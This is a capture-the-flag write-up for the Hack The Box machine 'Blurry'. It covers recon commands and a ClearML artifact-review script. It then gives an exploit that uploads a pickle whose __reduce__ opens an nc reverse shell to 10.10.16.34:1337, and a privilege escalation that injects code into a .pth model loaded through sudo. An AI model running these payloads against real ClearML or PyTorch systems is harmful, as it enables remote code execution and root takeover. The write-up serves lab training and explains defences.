HTB: Blurry

ShellPunk

Jorge Moreno / June 10, 2024


nmap -sC -sV -o nmap/[IP] [IP]

Add blurry.htb and app.blurry.htb to /etc/hosts.

ffuf -u http://blurry.htb -H "Host: FUZZ.blurry.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -fc 301

Add every subdomain that ffuf finds to /etc/hosts as well.

bookmark

#!/usr/bin/python3

from clearml import Task
from multiprocessing import Process
from clearml.backend_api.session.client import APIClient

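def process_task(task):
    """Fetch every artifact attached to *task* and pass dict payloads on for review.

    Args:
        task: A ClearML task object. Only its ``artifacts`` mapping
            (artifact name -> artifact object) is read here.

    Artifacts whose content is not a ``dict`` are reported on stdout and skipped.
    """
    artifacts = task.artifacts

    for artifact_name, artifact_object in artifacts.items():
        # SECURITY: this is the call where the uploaded payload fires.
        # NOTE(review): ClearML's artifact get() appears to unpickle objects that
        # were stored as pickles, so fetching an artifact written by another user
        # runs whatever that pickle instructs. The isinstance() check below only
        # sees the value after deserialization, so it cannot act as a filter.
        # Do not call get() on artifacts from writers this job does not trust.
        data = artifact_object.get()

        if isinstance(data, dict):
            process_json_artifact(data, artifact_name)
        else:
            print(f"[!] Artifact '{artifact_name}' content is not a dictionary.")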

def main():
    """Review every non-archived "Black Swan" task that carries the ``review`` tag.

    Registers this run as its own ClearML task, then starts one worker process
    per matching task (each running ``process_task``) and archives the task
    right after its worker has been started. The workers are not joined in
    this listing.

    NOTE(review): tasks are selected by project name and tag only. Presumably
    anyone able to create a tagged task in the project can get its artifacts
    loaded by this job; confirm against the server's access model.
    """
    review_task = Task.init(
        project_name="Black Swan",
        task_name="Review JSON Artifacts",
        task_type=Task.TaskTypes.data_processing,
    )

    # Candidates: tasks in the project tagged "review", archived ones excluded.
    pending = Task.get_tasks(
        project_name='Black Swan',
        tags=["review"],
        allow_archived=False,
    )

    if not pending:
        print("[!] No tasks up for review.")
        return

    workers = []
    for task in pending:
        print(f"[+] Reviewing artifacts from task: {task.name} (ID: {task.id})")
        worker = Process(target=process_task, args=(task,))
        worker.start()
        workers.append(worker)
        # Archiving removes the task from the next run's candidate list.
        task.set_archived(True)


# Script entry point: run the review pass once when executed directly.
if __name__ == "__main__":
    main()
    # NOTE(review): cleanup() is not defined anywhere in the listing as
    # reproduced here; unless the full script defines it, this call raises
    # NameError after main() returns.
    cleanup()

Exploit

attacker: 10.10.16.34

port: 1337

from clearml import Task
import os

class RunCommand:
    """Object whose pickled form carries a shell command.

    pickle asks an object how to rebuild itself through ``__reduce__`` and, on
    load, calls the returned callable with the returned argument tuple. Any
    process that unpickles an instance therefore runs that call with its own
    privileges. The defence sits on the consumer side: never unpickle
    artifacts from writers you do not trust.
    """
    def __reduce__(self):
        """Return ``(os.system, (command_string,))`` as the reconstruction recipe."""
        # The command string embeds the listener address and port given on the page.
        return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.34 1337 >/tmp/f',))

# Single module-level instance; upload_artifact() passes it as the artifact object.
command = RunCommand()

def upload_artifact():
    """Create the 'pick2me' task in the "Black Swan" project and attach ``command``.

    The object is stored as an artifact named 'innocence file'.

    NOTE(review): ClearML presumably serializes a non-file object like this
    with pickle, which is why ``__reduce__`` takes effect in whichever process
    later fetches the artifact; confirm against the clearml version in use.
    """
    task = Task.init(task_name='pick2me', project_name='Black Swan')
    # Attach the module-level object to the freshly created task.
    task.upload_artifact(artifact_object=command, name='innocence file')
    # Closing the task allows a later Task.init() in the same process.
    task.close()

# Script entry point: perform the upload once when executed directly.
if __name__ == "__main__":
    upload_artifact()

wildcard is the key

bookmark

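Using the script from the post linked above, we can inject malicious code into demo_model.pth and copy the modified file into the /models/ directory. This works because a .pth checkpoint is a pickle archive: a loader that fully unpickles it runs the code embedded in it, and here the loader is started through sudo. The defensive takeaway is that a privileged evaluator should only read model files from a directory that unprivileged users cannot write to, or load them with `torch.load(..., weights_only=True)`.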

python3 ./torch_pickle_inject.py demo_model.pth runpy 'import os; os.system("/bin/sh")'
sudo /usr/bin/model_evaluate /models/yourmodel.pth
